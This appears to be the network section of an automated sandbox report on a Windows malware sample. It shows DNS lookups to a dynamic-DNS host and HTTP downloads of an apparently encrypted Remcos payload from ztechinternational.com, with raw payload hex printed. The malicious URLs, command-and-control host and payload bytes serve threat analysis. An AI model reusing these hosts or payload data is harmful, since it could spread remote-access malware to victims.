            Jun 7, 2021 20:40:16.616372108 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616394997 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616427898 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616430044 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616488934 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616489887 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616545916 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616554022 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616596937 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616602898 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616650105 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616653919 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616703033 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616703987 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616755962 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616761923 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616816044 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616822004 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616878986 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616878986 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616936922 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616942883 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.616997957 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617002964 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617050886 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617093086 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617104053 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617110014 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617155075 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617156982 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617206097 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617208958 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617258072 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617261887 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617314100 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617319107 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617371082 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617376089 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617433071 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617444038 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617495060 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617495060 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617551088 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617558002 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617610931 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617618084 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617660999 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617667913 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.617712021 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.617713928 CEST4971580192.168.2.5192.185.113.219

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jun 7, 2021 20:39:15.636353970 CEST53653078.8.8.8192.168.2.5
            Jun 7, 2021 20:39:16.159529924 CEST6434453192.168.2.58.8.8.8
            Jun 7, 2021 20:39:16.203881979 CEST53643448.8.8.8192.168.2.5
            Jun 7, 2021 20:39:17.065033913 CEST6206053192.168.2.58.8.8.8
            Jun 7, 2021 20:39:17.107614994 CEST53620608.8.8.8192.168.2.5
            Jun 7, 2021 20:39:18.214163065 CEST6180553192.168.2.58.8.8.8
            Jun 7, 2021 20:39:18.256221056 CEST5479553192.168.2.58.8.8.8
            Jun 7, 2021 20:39:18.257023096 CEST53618058.8.8.8192.168.2.5
            Jun 7, 2021 20:39:18.299247026 CEST53547958.8.8.8192.168.2.5
            Jun 7, 2021 20:39:19.458029985 CEST4955753192.168.2.58.8.8.8
            Jun 7, 2021 20:39:19.502902985 CEST53495578.8.8.8192.168.2.5
            Jun 7, 2021 20:39:19.787540913 CEST6173353192.168.2.58.8.8.8
            Jun 7, 2021 20:39:19.830528975 CEST53617338.8.8.8192.168.2.5
            Jun 7, 2021 20:39:21.107762098 CEST6544753192.168.2.58.8.8.8
            Jun 7, 2021 20:39:21.151705027 CEST53654478.8.8.8192.168.2.5
            Jun 7, 2021 20:39:22.243340969 CEST5244153192.168.2.58.8.8.8
            Jun 7, 2021 20:39:22.285727024 CEST53524418.8.8.8192.168.2.5
            Jun 7, 2021 20:39:23.469666958 CEST6217653192.168.2.58.8.8.8
            Jun 7, 2021 20:39:23.512276888 CEST53621768.8.8.8192.168.2.5
            Jun 7, 2021 20:39:26.958093882 CEST5959653192.168.2.58.8.8.8
            Jun 7, 2021 20:39:27.000623941 CEST53595968.8.8.8192.168.2.5
            Jun 7, 2021 20:39:28.118021965 CEST6529653192.168.2.58.8.8.8
            Jun 7, 2021 20:39:28.161216974 CEST53652968.8.8.8192.168.2.5
            Jun 7, 2021 20:39:29.352226019 CEST6318353192.168.2.58.8.8.8
            Jun 7, 2021 20:39:29.394970894 CEST53631838.8.8.8192.168.2.5
            Jun 7, 2021 20:39:30.309854031 CEST6015153192.168.2.58.8.8.8
            Jun 7, 2021 20:39:30.352472067 CEST53601518.8.8.8192.168.2.5
            Jun 7, 2021 20:39:40.315676928 CEST5696953192.168.2.58.8.8.8
            Jun 7, 2021 20:39:40.391956091 CEST53569698.8.8.8192.168.2.5
            Jun 7, 2021 20:40:11.456367970 CEST5516153192.168.2.58.8.8.8
            Jun 7, 2021 20:40:11.501616001 CEST53551618.8.8.8192.168.2.5
            Jun 7, 2021 20:40:15.139851093 CEST5475753192.168.2.58.8.8.8
            Jun 7, 2021 20:40:15.182657003 CEST53547578.8.8.8192.168.2.5
            Jun 7, 2021 20:40:17.828134060 CEST4999253192.168.2.58.8.8.8
            Jun 7, 2021 20:40:17.887542009 CEST53499928.8.8.8192.168.2.5
            Jun 7, 2021 20:41:45.469919920 CEST6007553192.168.2.58.8.8.8
            Jun 7, 2021 20:41:45.515211105 CEST53600758.8.8.8192.168.2.5
            Jun 7, 2021 20:41:46.582689047 CEST5501653192.168.2.58.8.8.8
            Jun 7, 2021 20:41:46.634160042 CEST53550168.8.8.8192.168.2.5
            Jun 7, 2021 20:41:46.844860077 CEST6434553192.168.2.58.8.8.8
            Jun 7, 2021 20:41:47.009615898 CEST53643458.8.8.8192.168.2.5
            Jun 7, 2021 20:42:04.840228081 CEST5712853192.168.2.58.8.8.8
            Jun 7, 2021 20:42:04.883430958 CEST53571288.8.8.8192.168.2.5
            Jun 7, 2021 20:42:06.102648973 CEST5479153192.168.2.58.8.8.8
            Jun 7, 2021 20:42:06.147685051 CEST53547918.8.8.8192.168.2.5
            Jun 7, 2021 20:42:08.818110943 CEST5046353192.168.2.58.8.8.8
            Jun 7, 2021 20:42:08.897591114 CEST53504638.8.8.8192.168.2.5
            Jun 7, 2021 20:42:30.869050026 CEST5039453192.168.2.58.8.8.8
            Jun 7, 2021 20:42:30.924316883 CEST53503948.8.8.8192.168.2.5
            Jun 7, 2021 20:42:30.982857943 CEST5853053192.168.2.58.8.8.8
            Jun 7, 2021 20:42:31.048449039 CEST53585308.8.8.8192.168.2.5
            Jun 7, 2021 20:42:53.187896967 CEST5381353192.168.2.58.8.8.8
            Jun 7, 2021 20:42:53.230797052 CEST53538138.8.8.8192.168.2.5
            Jun 7, 2021 20:42:53.588551044 CEST6373253192.168.2.58.8.8.8
            Jun 7, 2021 20:42:53.631545067 CEST53637328.8.8.8192.168.2.5
            Jun 7, 2021 20:42:54.546822071 CEST5734453192.168.2.58.8.8.8
            Jun 7, 2021 20:42:54.591564894 CEST53573448.8.8.8192.168.2.5
            Jun 7, 2021 20:42:54.802068949 CEST5445053192.168.2.58.8.8.8
            Jun 7, 2021 20:42:54.852761030 CEST53544508.8.8.8192.168.2.5
            Jun 7, 2021 20:42:55.223762989 CEST5926153192.168.2.58.8.8.8
            Jun 7, 2021 20:42:55.266818047 CEST53592618.8.8.8192.168.2.5
            Jun 7, 2021 20:42:55.784835100 CEST5715153192.168.2.58.8.8.8
            Jun 7, 2021 20:42:55.829243898 CEST53571518.8.8.8192.168.2.5
            Jun 7, 2021 20:42:56.724102020 CEST5941353192.168.2.58.8.8.8
            Jun 7, 2021 20:42:56.766937971 CEST53594138.8.8.8192.168.2.5
            Jun 7, 2021 20:42:57.423441887 CEST6051653192.168.2.58.8.8.8
            Jun 7, 2021 20:42:57.467859030 CEST53605168.8.8.8192.168.2.5
            Jun 7, 2021 20:42:58.198364019 CEST5164953192.168.2.58.8.8.8
            Jun 7, 2021 20:42:58.330707073 CEST53516498.8.8.8192.168.2.5
            Jun 7, 2021 20:42:59.092617035 CEST6508653192.168.2.58.8.8.8
            Jun 7, 2021 20:42:59.135557890 CEST53650868.8.8.8192.168.2.5
            Jun 7, 2021 20:43:00.117387056 CEST5643253192.168.2.58.8.8.8
            Jun 7, 2021 20:43:00.162828922 CEST53564328.8.8.8192.168.2.5
            Jun 7, 2021 20:43:00.682595968 CEST5292953192.168.2.58.8.8.8
            Jun 7, 2021 20:43:00.725472927 CEST53529298.8.8.8192.168.2.5
            Jun 7, 2021 20:43:15.299810886 CEST6431753192.168.2.58.8.8.8
            Jun 7, 2021 20:43:15.359699011 CEST53643178.8.8.8192.168.2.5

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Jun 7, 2021 20:40:15.139851093 CEST192.168.2.58.8.8.80xebc1Standard query (0)ztechinternational.comA (IP address)IN (0x0001)
            Jun 7, 2021 20:41:45.469919920 CEST192.168.2.58.8.8.80xe8fStandard query (0)ztechinternational.comA (IP address)IN (0x0001)
            Jun 7, 2021 20:41:46.582689047 CEST192.168.2.58.8.8.80x532Standard query (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.euA (IP address)IN (0x0001)
            Jun 7, 2021 20:41:46.844860077 CEST192.168.2.58.8.8.80xaeb5Standard query (0)ztechinternational.comA (IP address)IN (0x0001)
            Jun 7, 2021 20:42:04.840228081 CEST192.168.2.58.8.8.80x9c77Standard query (0)ztechinternational.comA (IP address)IN (0x0001)
            Jun 7, 2021 20:42:08.818110943 CEST192.168.2.58.8.8.80x39d7Standard query (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.euA (IP address)IN (0x0001)
            Jun 7, 2021 20:42:30.982857943 CEST192.168.2.58.8.8.80x9e52Standard query (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.euA (IP address)IN (0x0001)
            Jun 7, 2021 20:42:53.187896967 CEST192.168.2.58.8.8.80x5851Standard query (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.euA (IP address)IN (0x0001)
            Jun 7, 2021 20:43:15.299810886 CEST192.168.2.58.8.8.80x44fStandard query (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.euA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Jun 7, 2021 20:40:15.182657003 CEST8.8.8.8192.168.2.50xebc1No error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
            Jun 7, 2021 20:41:45.515211105 CEST8.8.8.8192.168.2.50xe8fNo error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
            Jun 7, 2021 20:41:46.634160042 CEST8.8.8.8192.168.2.50x532No error (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu188.72.110.19A (IP address)IN (0x0001)
            Jun 7, 2021 20:41:47.009615898 CEST8.8.8.8192.168.2.50xaeb5No error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
            Jun 7, 2021 20:42:04.883430958 CEST8.8.8.8192.168.2.50x9c77No error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
            Jun 7, 2021 20:42:08.897591114 CEST8.8.8.8192.168.2.50x39d7No error (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu188.72.110.19A (IP address)IN (0x0001)
            Jun 7, 2021 20:42:31.048449039 CEST8.8.8.8192.168.2.50x9e52No error (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu188.72.110.19A (IP address)IN (0x0001)
            Jun 7, 2021 20:42:53.230797052 CEST8.8.8.8192.168.2.50x5851No error (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu188.72.110.19A (IP address)IN (0x0001)
            Jun 7, 2021 20:43:15.359699011 CEST8.8.8.8192.168.2.50x44fNo error (0)gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu188.72.110.19A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • ztechinternational.com

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.549715192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            TimestampkBytes transferredDirectionData
            Jun 7, 2021 20:40:16.131059885 CEST1066OUTGET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: ztechinternational.com
            Cache-Control: no-cache
            Jun 7, 2021 20:40:16.297375917 CEST1067INHTTP/1.1 200 OK
            Date: Mon, 07 Jun 2021 18:40:16 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade
            Last-Modified: Sun, 06 Jun 2021 21:56:54 GMT
            Accept-Ranges: bytes
            Content-Length: 131136
            Content-Type: application/octet-stream
            Data Raw: b0 8d ab 08 57 8e 61 a7 eb fe 2b 2b 06 b8 da 62 ed 86 b7 cb 09 e0 c1 d9 23 4e 2a 90 8e 19 c3 4f b3 a9 65 45 5e 99 bd 65 16 b3 e2 e5 9a 0a 6a 91 27 49 c4 22 07 be b6 97 d1 46 de 76 8f 6c d7 30 cb db 1a 49 82 a3 a0 55 f9 d4 01 88 ef da af cc 85 6e 84 a1 db d1 10 b6 55 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f 59 68 15 6d 0d fd bf 44 b3 73 04 a0 9c 6f 2b f9 f5 66 57 02 b2 46 e8 3e 7f af 59 fe 21 89 70 94 9b 6c 3d 9f 3d 1c a0 15 40 34 53 93 10 88 26 bb eb c2 44 c5 23 e9 41 a6 59 3e dc 09 e6 a4 63 fc 44 c9 56 37 65 b6 b1 2a 03 b3 6c 60 62 10 d6 33 03 4f 95 53 3a c2 37 98 96 74 c8 94 09 09 78 e6 26 ca b9 76 15 1d ee 17 ba 70 14 4c db ce 47 43 cc 8d 7e 25 2b ea 7b 46 1f e3 2e 46 4b aa 04 b1 34 14 16 54 84 a9 3d 56 8d c7 18 59 8e b8 99 33 a8 b9 21 36 c5 0e 31 01 51 96 78 4b d3 da 0d c2 f0 49 60 62 11 32 3d f1 94 40 6e 6e 78 3e fd 20 06 3e 66 79 25 29 16 7b 28 40 55 7b 2b 1a d9 28 4e 1d 7d ce 8d 4f 34 86 77 e4 9a bd 6c 22 fc a6 eb 98 20 d8 1f 49 ce 91 e4 72 00 c7 52 36 9e 79 bc cf a0 d8 98 9a 1d 93 1a bc a8 f1 53 b3 bb 5e d8 e6 e6 03 09 05 97 f2 2b 16 e7 81 22 61 73 ec 32 81 65 97 67 c4 3f f6 74 05 e4 4d c7 b4 11 79 f8 83 29 3a 59 99 ee 2b ff 40 1c 5f e1 e6 0e 28 08 e3 9a 93 c1 e7 6f 07 50 ab 33 20 6f da c7 ef 9b 4d 22 8a 1c e3 23 ad 9a ee d7 ec 42 8b ca c5 73 4b b1 a3 fe 3a 61 a9 a7 4f f2 7f a7 22 24 65 2a 63 85 71 be 6f 2f a0 6d b1 37 69 19 c6 bc 34 51 c3 71 d0 a3 c5 67 2f e5 8b 82 54 cc cc 97 99 c4 70 91 71 85 54 8c a8 10 58 9c 57 13 1d bf 34 38 2a 88 27 97 72 e6 fa 4d bc 07 5c ff c5 ec b6 73 9f d2 d9 a5 9c 31 d1 17 6a a2 dc cc 64 92 6e 47 a4 aa 17 4e b2 9c 7e 02 6c c4 fa db ec 6f f7 b5 b3 1d 92 eb 12 66 3f e0 b0 11 15 00 c3 78 bd 3b c5 25 6a 26 d7 ec b9 22 cd 6d 99 0a 33 b0 1e 47 45 42 40 b6 c5 7f f3 6e e1 69 2a a8 e5 70 cf 04 0d 71 56 82 91 88 b1 a6 43 17 f8 54 eb 78 dd 81 71 ce 9d 45 8c c9 5e 20 6c 9e 33 eb 13 78 18 80 58 66 79 ab ae 36 ca 33 06 14 c7 3a e7 b0 c5 73 f2 ab 02 da 42 a1 42 df 57 00 2c 4f da cf 05 24 30 70 63 d6 d2 c5 90 69 47 92 b2 ba 97 ac cf f2 93 d1 8d f9 c6 58 8f 55 8c 1a ef 2e 90 25 cc b2 77 55 a3 ef b3 21 c9 88 cb f6 5c 4a 21 47 e0 f4 7c 2e 5e fc 27 2f 2d ec 9c 69 f7 80 ad 20 19 8c 98 a6 34 ac 57 4c 0d e7 69 3b b8 36 d6 24 58 4b ee cb 1d 12 59 68 2c 50 dd 1b e5 de cb 60 41 11 57 2c 19 bc c0 37 10 9c 7a 11 26 0a f2 08 3b d4 84 4c 2d 95 40 2f 53 ab 1f 79 f5 23 a7 58 f3 3d 20 3a f9 0a e4 1b ab ca 43 1c 0e 7b d9 4d 10 f6 3e d3 53 6a 68 dd 69 4a bb f2 29 0c 30 86 52 eb 7c 44 65 90 8b 60 93 90 c1 07 57 b8 f0 1c f0 d1 31 2e 7a 26 a2 79 39 ea 8c 5e 68 fa 4c dd 93 b6 86 81 8a 49 81 a3 a0 55 fd d4 01 88 10 25 af cc 3d 6e 84 a1 db d1 10 b6 15 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f a1 68 15 6d 03 e2 05 4a b3 c7 0d 6d bd d7 2a b5 38 47 03 6a db 35 c8 4e 0d c0 3e 8c 40 e4 50 f7 fa 02 53 f0 49 3c c2 70 60 46 26 fd 30 e1 48 9b af 8d 17 e5 4e 86 25 c3 77 33 d1 03 c2 a4 63 fc 44 c9 56 37 01 ca 36 93 23 ae 85 8a 42 0d 3f d9 23 52 7c b9 57 fc c3 72 b7 69 21 7e 7a 37 88 0c 04 d7 50 9c 35 00 07 fd 95 6d fd a6 80 cf a2 a9 ed 90 97 cf 88 eb 9c ac 3b fe c7 ac 83 a8 e7 5b 1f 09 ff be 4c ab d0 bc a9 da f1 b3 cc ba 63 d9 87 a4 c8 dc e5 13 d9 eb 3e 8a 91 a1 4b c1 e2 28 d1 54 89 88 d9 30 df 1b aa 5d 87 84 2a 57 9e
            Data Ascii: Wa++b#N*OeE^ej'I"Fvl0IUnU*CqFB^0~x?mYhmDso+fWF>Y!pl==@4S&D#AY>cDV7e*l`b3OS:7tx&vpLGC~%+{F.FK4T=VY3!61QxKI`b2=@nnx> >fy%){(@U{+(N}O4wl" IrR6yS^+"as2eg?tMy):Y+@_(oP3 oM"#BsK:aO"$e*cqo/m7i4Qqg/TpqTXW48*'rM\s1jdnGN~lof?x;%j&"m3GEB@ni*pqVCTxqE^ l3xXfy63:sBBW,O$0pciGXU.%wU!\J!G|.^'/-i 4WLi;6$XKYh,P`AW,7z&;L-@/Sy#X= :C{M>SjhiJ)0R|De`W1.z&y9^hLIU%=n*CqFB^0~x?mhmJm*8Gj5N>@PSI<p`F&0HN%w3cDV76#B?#R|Wri!~z7P5m;[Lc>K(T0]*W


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.549718192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            TimestampkBytes transferredDirectionData
            Jun 7, 2021 20:41:45.755729914 CEST1510OUTGET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: ztechinternational.com
            Cache-Control: no-cache
            Jun 7, 2021 20:41:45.921027899 CEST1512INHTTP/1.1 200 OK
            Date: Mon, 07 Jun 2021 18:41:45 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade
            Last-Modified: Sun, 06 Jun 2021 21:56:54 GMT
            Accept-Ranges: bytes
            Content-Length: 131136
            Content-Type: application/octet-stream
            Data Raw: b0 8d ab 08 57 8e 61 a7 eb fe 2b 2b 06 b8 da 62 ed 86 b7 cb 09 e0 c1 d9 23 4e 2a 90 8e 19 c3 4f b3 a9 65 45 5e 99 bd 65 16 b3 e2 e5 9a 0a 6a 91 27 49 c4 22 07 be b6 97 d1 46 de 76 8f 6c d7 30 cb db 1a 49 82 a3 a0 55 f9 d4 01 88 ef da af cc 85 6e 84 a1 db d1 10 b6 55 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f 59 68 15 6d 0d fd bf 44 b3 73 04 a0 9c 6f 2b f9 f5 66 57 02 b2 46 e8 3e 7f af 59 fe 21 89 70 94 9b 6c 3d 9f 3d 1c a0 15 40 34 53 93 10 88 26 bb eb c2 44 c5 23 e9 41 a6 59 3e dc 09 e6 a4 63 fc 44 c9 56 37 65 b6 b1 2a 03 b3 6c 60 62 10 d6 33 03 4f 95 53 3a c2 37 98 96 74 c8 94 09 09 78 e6 26 ca b9 76 15 1d ee 17 ba 70 14 4c db ce 47 43 cc 8d 7e 25 2b ea 7b 46 1f e3 2e 46 4b aa 04 b1 34 14 16 54 84 a9 3d 56 8d c7 18 59 8e b8 99 33 a8 b9 21 36 c5 0e 31 01 51 96 78 4b d3 da 0d c2 f0 49 60 62 11 32 3d f1 94 40 6e 6e 78 3e fd 20 06 3e 66 79 25 29 16 7b 28 40 55 7b 2b 1a d9 28 4e 1d 7d ce 8d 4f 34 86 77 e4 9a bd 6c 22 fc a6 eb 98 20 d8 1f 49 ce 91 e4 72 00 c7 52 36 9e 79 bc cf a0 d8 98 9a 1d 93 1a bc a8 f1 53 b3 bb 5e d8 e6 e6 03 09 05 97 f2 2b 16 e7 81 22 61 73 ec 32 81 65 97 67 c4 3f f6 74 05 e4 4d c7 b4 11 79 f8 83 29 3a 59 99 ee 2b ff 40 1c 5f e1 e6 0e 28 08 e3 9a 93 c1 e7 6f 07 50 ab 33 20 6f da c7 ef 9b 4d 22 8a 1c e3 23 ad 9a ee d7 ec 42 8b ca c5 73 4b b1 a3 fe 3a 61 a9 a7 4f f2 7f a7 22 24 65 2a 63 85 71 be 6f 2f a0 6d b1 37 69 19 c6 bc 34 51 c3 71 d0 a3 c5 67 2f e5 8b 82 54 cc cc 97 99 c4 70 91 71 85 54 8c a8 10 58 9c 57 13 1d bf 34 38 2a 88 27 97 72 e6 fa 4d bc 07 5c ff c5 ec b6 73 9f d2 d9 a5 9c 31 d1 17 6a a2 dc cc 64 92 6e 47 a4 aa 17 4e b2 9c 7e 02 6c c4 fa db ec 6f f7 b5 b3 1d 92 eb 12 66 3f e0 b0 11 15 00 c3 78 bd 3b c5 25 6a 26 d7 ec b9 22 cd 6d 99 0a 33 b0 1e 47 45 42 40 b6 c5 7f f3 6e e1 69 2a a8 e5 70 cf 04 0d 71 56 82 91 88 b1 a6 43 17 f8 54 eb 78 dd 81 71 ce 9d 45 8c c9 5e 20 6c 9e 33 eb 13 78 18 80 58 66 79 ab ae 36 ca 33 06 14 c7 3a e7 b0 c5 73 f2 ab 02 da 42 a1 42 df 57 00 2c 4f da cf 05 24 30 70 63 d6 d2 c5 90 69 47 92 b2 ba 97 ac cf f2 93 d1 8d f9 c6 58 8f 55 8c 1a ef 2e 90 25 cc b2 77 55 a3 ef b3 21 c9 88 cb f6 5c 4a 21 47 e0 f4 7c 2e 5e fc 27 2f 2d ec 9c 69 f7 80 ad 20 19 8c 98 a6 34 ac 57 4c 0d e7 69 3b b8 36 d6 24 58 4b ee cb 1d 12 59 68 2c 50 dd 1b e5 de cb 60 41 11 57 2c 19 bc c0 37 10 9c 7a 11 26 0a f2 08 3b d4 84 4c 2d 95 40 2f 53 ab 1f 79 f5 23 a7 58 f3 3d 20 3a f9 0a e4 1b ab ca 43 1c 0e 7b d9 4d 10 f6 3e d3 53 6a 68 dd 69 4a bb f2 29 0c 30 86 52 eb 7c 44 65 90 8b 60 93 90 c1 07 57 b8 f0 1c f0 d1 31 2e 7a 26 a2 79 39 ea 8c 5e 68 fa 4c dd 93 b6 86 81 8a 49 81 a3 a0 55 fd d4 01 88 10 25 af cc 3d 6e 84 a1 db d1 10 b6 15 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f a1 68 15 6d 03 e2 05 4a b3 c7 0d 6d bd d7 2a b5 38 47 03 6a db 35 c8 4e 0d c0 3e 8c 40 e4 50 f7 fa 02 53 f0 49 3c c2 70 60 46 26 fd 30 e1 48 9b af 8d 17 e5 4e 86 25 c3 77 33 d1 03 c2 a4 63 fc 44 c9 56 37 01 ca 36 93 23 ae 85 8a 42 0d 3f d9 23 52 7c b9 57 fc c3 72 b7 69 21 7e 7a 37 88 0c 04 d7 50 9c 35 00 07 fd 95 6d fd a6 80 cf a2 a9 ed 90 97 cf 88 eb 9c ac 3b fe c7 ac 83 a8 e7 5b 1f 09 ff be 4c ab d0 bc a9 da f1 b3 cc ba 63 d9 87 a4 c8 dc e5 13 d9 eb 3e 8a 91 a1 4b c1 e2 28 d1 54 89 88 d9 30 df 1b aa 5d 87 84 2a 57 9e
            Data Ascii: Wa++b#N*OeE^ej'I"Fvl0IUnU*CqFB^0~x?mYhmDso+fWF>Y!pl==@4S&D#AY>cDV7e*l`b3OS:7tx&vpLGC~%+{F.FK4T=VY3!61QxKI`b2=@nnx> >fy%){(@U{+(N}O4wl" IrR6yS^+"as2eg?tMy):Y+@_(oP3 oM"#BsK:aO"$e*cqo/m7i4Qqg/TpqTXW48*'rM\s1jdnGN~lof?x;%j&"m3GEB@ni*pqVCTxqE^ l3xXfy63:sBBW,O$0pciGXU.%wU!\J!G|.^'/-i 4WLi;6$XKYh,P`AW,7z&;L-@/Sy#X= :C{M>SjhiJ)0R|De`W1.z&y9^hLIU%=n*CqFB^0~x?mhmJm*8Gj5N>@PSI<p`F&0HN%w3cDV76#B?#R|Wri!~z7P5m;[Lc>K(T0]*W


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.549720192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            TimestampkBytes transferredDirectionData
            Jun 7, 2021 20:41:47.229598045 CEST1649OUTGET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: ztechinternational.com
            Cache-Control: no-cache
            Jun 7, 2021 20:41:47.405806065 CEST1650INHTTP/1.1 200 OK
            Date: Mon, 07 Jun 2021 18:41:47 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade
            Last-Modified: Sun, 06 Jun 2021 21:56:54 GMT
            Accept-Ranges: bytes
            Content-Length: 131136
            Content-Type: application/octet-stream
